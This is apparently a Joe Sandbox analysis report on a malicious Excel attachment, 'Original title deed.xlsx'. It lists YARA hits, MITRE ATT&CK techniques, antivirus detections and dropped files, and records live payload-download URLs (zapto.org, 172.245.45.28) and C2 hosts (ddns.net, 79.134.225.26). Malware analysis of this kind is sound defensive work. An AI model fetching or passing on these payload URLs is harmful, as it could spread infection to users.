Source: Yara match	File source: 0000000C.00000002.2216316661.0000000000440000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273346019.0000000002760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2222957542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2316058647.00000000027E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2368425680.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2279056519.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2150412960.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231524539.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2168675163.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2216660226.0000000001F12000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2362066898.0000000002870000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2307464017.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2315962190.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2231421251.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287694546.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2208178016.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2181664137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163268669.0000000002680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2176935258.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2347167149.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2329560547.00000000005F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2292417320.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2163468304.00000000030A2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2191917779.00000000027D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2245905137.0000000002780000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2346463875.0000000002750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2287767683.0000000002852000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2177049947.0000000002832000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2264948911.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2330418460.0000000002942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2192149288.0000000002862000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2202107255.0000000002770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2273452074.00000000027F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2337833503.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2544, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 2872, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2780, type: MEMORY
Source: Yara match	File source: 24.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vbc.exe.2760000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.vbc.exe.5f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.vbc.exe.2870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2750000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.vbc.exe.2750000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.vbc.exe.27c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.vbc.exe.1e90000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.2860000.7.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Access Token Manipulation1	Masquerading111	OS Credential Dumping	Security Software Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection111	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Access Token Manipulation1	Security Account Manager	Remote System Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery4	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol122	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing11	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
24.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
8.2.vbc.exe.2860000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
30.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
14.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
23.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.2.vbc.exe.2830000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
5.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
16.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
15.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.2.vbc.exe.2860000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
20.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
4.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
30.2.vbc.exe.2830000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
20.2.vbc.exe.27f0000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
28.2.vbc.exe.2940000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
24.2.vbc.exe.27f0000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
21.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
30.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
34.2.vbc.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
28.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
10.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
27.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
10.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
29.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
32.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
26.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
8.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
32.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
24.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
34.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
12.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
22.2.vbc.exe.2850000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
22.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
22.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
25.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
28.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
16.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
26.2.vbc.exe.27e0000.7.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
7.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
6.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
20.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
26.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
4.2.vbc.exe.30a0000.8.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
31.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.2.vbc.exe.1f10000.4.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
9.2.MSBuild.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
18.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
18.2.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
8.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File
12.0.vbc.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1130366	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
79.134.225.26	0%	Avira URL Cloud	safe
nassiru1166main.ddns.net	0%	Avira URL Cloud	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe	100%	Avira URL Cloud	phishing
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myhostisstillgood11.zapto.org	172.245.45.28	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
79.134.225.26	true	Avira URL Cloud: safe	unknown
nassiru1166main.ddns.net	true	Avira URL Cloud: safe	unknown
http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	vbc.exe, 0000000A.00000002.2202157989.0000000002B60000.00000002.00000001.sdmp	false		high
http://investor.msn.com	vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmp	false		high
http://nsis.sf.net/NSIS_Error	vbc.exe, vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmp	false		high
http://investor.msn.com/	vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	vbc.exe, 00000004.00000002.2162506634.0000000001DC0000.00000002.00000001.sdmp, vbc.exe, 00000006.00000002.2176037338.00000000020E0000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2190288493.0000000001F10000.00000002.00000001.sdmp, vbc.exe, 00000020.00000002.2360706938.0000000001E10000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000006.00000000.2161802595.000000000040A000.00000008.00020000.sdmp, vbc.exe, 00000008.00000002.2189440856.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000A.00000002.2201161268.000000000040A000.00000004.00020000.sdmp, vbc.exe, 0000000C.00000002.2216255904.000000000040A000.00000004.00020000.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.2177387139.0000000002D77000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192741751.0000000002DA7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	vbc.exe, 00000006.00000002.2177181364.0000000002B90000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2192380322.0000000002BC0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.245.45.28	myhostisstillgood11.zapto.org	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	402852
Start date:	03.05.2021
Start time:	14:54:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Original title deed.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.expl.evad.winXLSX@65/72@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 76.5% (good quality ratio 75.2%) Quality average: 86.4% Quality standard deviation: 22.4%
HCA Information:	Successful, ratio: 90% Number of executed functions: 78 Number of non-executed functions: 35
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:55:04	API Interceptor	79x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.245.45.28	471e3984_by_Libranalysis.docx	Get hash	malicious	Browse	nta.hopto.org/reg/vbc.exe
	Original title deed.xlsx	Get hash	malicious	Browse	myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
	product specification.xlsx	Get hash	malicious	Browse	myhostisstillgood11.zapto.org/dashboard/docs/images/kn.exe
	Original title deed.xlsx	Get hash	malicious	Browse	172.245.45.28/dashboard/docs/images/nd.exe
	INVOICE.xlsx	Get hash	malicious	Browse	172.245.45.28/img/america/white/nd.exe
	QUOTE4885 - NP200.xlsx	Get hash	malicious	Browse	172.245.45.28/img/america/white/nd.exe
	original title deed.xlsx	Get hash	malicious	Browse	172.245.45.28/img/america/white/nd.exe
	RFQ180584.xlsx	Get hash	malicious	Browse	weloveplayinggames.servegame.com/img/covid19/covid.exe
	gOMIKZsuDd.docx	Get hash	malicious	Browse	doctor.hopto.org/torotoro/nd.dot
	4lcewJbARW.docx	Get hash	malicious	Browse	doctor.hopto.org/dashboard/
	gOMIKZsuDd.docx	Get hash	malicious	Browse	doctor.hopto.org/torotoro/nd.dot
	RFQ180584.xlsx	Get hash	malicious	Browse	172.245.45.28/img/covid19/drug.exe
	6VjgC99atY.rtf	Get hash	malicious	Browse	doctor.hopto.org/torotoro/kn.exe
	G9kQExKBp5.docx	Get hash	malicious	Browse	172.245.45.28/dashboard/
	SOA 83773.xlsx	Get hash	malicious	Browse	172.245.45.28/torotoro/nd.exe
	Swift Copy Ref.xlsx	Get hash	malicious	Browse	172.245.45.28/torotoro/kn.exe
	yOShx2XvCx.rtf	Get hash	malicious	Browse	172.245.45.28/torotoro/kn.exe
	GCvfEfu3QG.rtf	Get hash	malicious	Browse	172.245.45.28/torotoro/nd.exe
	transfer request Form.docx	Get hash	malicious	Browse	172.245.45.28/dashboard/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
myhostisstillgood11.zapto.org	Original title deed.xlsx	Get hash	malicious	Browse	172.245.45.28
myhostisstillgood11.zapto.org	product specification.xlsx	Get hash	malicious	Browse	172.245.45.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	195686de_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	471e3984_by_Libranalysis.docx	Get hash	malicious	Browse	172.245.45.28
	e0d55c2c_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f95f4b12_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2f119d38_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	59fcec0a_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2dbff645_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	9a59e803_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	65dcd283_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d8b77647_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	b7016660_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	2cd7f5f9_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	47f9e048_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	e8046237_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f06a0327_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	d227c1f6_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	0ca13b51_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	fc2a5233_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	f8c8f21a_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10
	129ce885_by_Libranalysis.dll	Get hash	malicious	Browse	107.172.227.10

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	599035
Entropy (8bit):	7.977146744978909
Encrypted:	false
SSDEEP:	12288:aCkfYIfK//zHuSkSzInubnIs/m3LLaJ4FwYRevuKiDbyT7iC5:aJlK/rHuSzInubIs/ILaJwRUuKPF5
MD5:	669DD51D521BE84D6F2C45012115FC5F
SHA1:	DD4CBEE8A337E7E6BB7D5C570DB79D7C0F7A7EDE
SHA-256:	5B6D4E4E80DD9A93F40ECFC45C2874D0C504ECF3680858BE3ED8E05381CF1188
SHA-512:	77B918749FD865B999BB9A4956A7150882683C1CDB9AEF72883F72213E097C64BBD95E4FA2DE3B7814A22C392541EE304B0F276C66C775A464539F7900B58172
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
IE Cache URL:	http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@.......................................@.................................8........................................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............\|..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A1D09AB.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\846ADFD2.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category:	dropped
Size (bytes):	48770
Entropy (8bit):	7.801842363879827
Encrypted:	false
SSDEEP:	768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5:	AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1:	200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256:	56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512:	A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious:	false
Preview:	......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B44CEF.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	653280
Entropy (8bit):	2.8986555579375235
Encrypted:	false
SSDEEP:	3072:Q34UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:q4UcLe0JOqQQZR8MDdATCR3tS+jqcC
